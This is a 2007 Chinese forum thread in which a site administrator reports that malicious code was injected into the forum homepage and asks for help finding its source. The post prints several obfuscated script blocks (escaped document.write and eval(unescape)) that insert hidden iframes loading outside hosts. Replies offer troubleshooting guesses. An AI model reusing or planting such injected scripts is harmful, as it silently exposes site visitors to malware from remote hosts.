edo


disconnected
主题工具

首頁被放病毒代碼

... 发表于 2007-12-24 01:16  ... 10170 次点击

=.=!用pp首頁被放病毒代碼,不知把在那裡!檢查中,,,,是安全性問題嗎?
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');

</script><!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%63%61%33%64%38%61%65%64%34%38%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%78%2d%76%69%63%74%6f%72%79%2e%72%75%2f%66%6f%72%75%6d%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%31%32%37%32%29%2b%27%63%37%66%64%5c%27%20%77%69%64%74%68%3d%35%33%34%20%68%65%69%67%68%74%3d%35%30%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><!-- ~ --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><!-- ~ --><!-- ~ --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0062\u0069\u0067\u0073\u0074\u006f\u0072\u0065\u0075\u0073\u002e\u0069\u006e\u0066\u006f\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script><!-- ~ -->


本主题共有 5 条回复 | 回到顶部
#1 - 2007-12-25 22:03
edo 地球
sai,,,,,,測試後確實好像有問題
測試過5個方案,用同一數據的資料
1.Discuz 6.0
2.Discuz 5.5 (7月24前版舊版本)
3.Discuz 5.5 (7月24後新版本)
4.pp + 整合Discuz 5.5 (7月24前版舊版本)
5.pp + 整合Discuz 5.5 (7月24後新版本)
============
先確認的問題,
1.在我壇某些會員交提的資料包含不良代碼(暫時查不到)
在以上測試中,1和3佳沒問題,好像被過濾了=.=!。
5方案經修改後,上面4-5段不良代碼,餘下一後未解決到。
#2 - 2007-12-25 22:15
Sai 桂林
這段代碼被放到什麽地方?以什麽方式顯示?
#3 - 2007-12-25 23:26
edo 地球
放在那不知道=.=!
以<iframe>顯示,,,,,
1.如果有裝防毒軟件,防毒軟件會彈出來說有毒,之後過濾了!
2.左下角會顯示錯誤,是那後後的錯誤!

以原始碼檔看是在</html>後面,即最後=.=!找不到位置
以前那些還可以找到位置,這個找不到。只可以靠更新檔過濾部份。

整個數據都找了!

會員跟主題資料表未找!太大=.=!
分割完在找.....

[ 本帖最后由 edo 于 2007-12-25 23:27 编辑 ]
#4 - 2007-12-25 23:46
Sai 桂林
有别的会员提出否?有可能是机器中毒了...因为除了修改模板是没有有效的挂马方式的
#5 - 2007-12-27 08:33
liangxin 绵阳
还可能是ARP攻击,安装一个ARP防火墙
看完之后有话想说?那就帮楼主加盖一层吧!

在回复之前你需要先进行登录
用户名 / UID
密码
Project Parasynthesis | Based on Discuz! 5.5.0 | Thanks to Livid
About | Help | Developer | N2Design
清除 Cookies - 联系我们 - 无名杂志 - Archiver - Mobile
Processed in 0.035764 second(s), 6 queries, Gzip enabled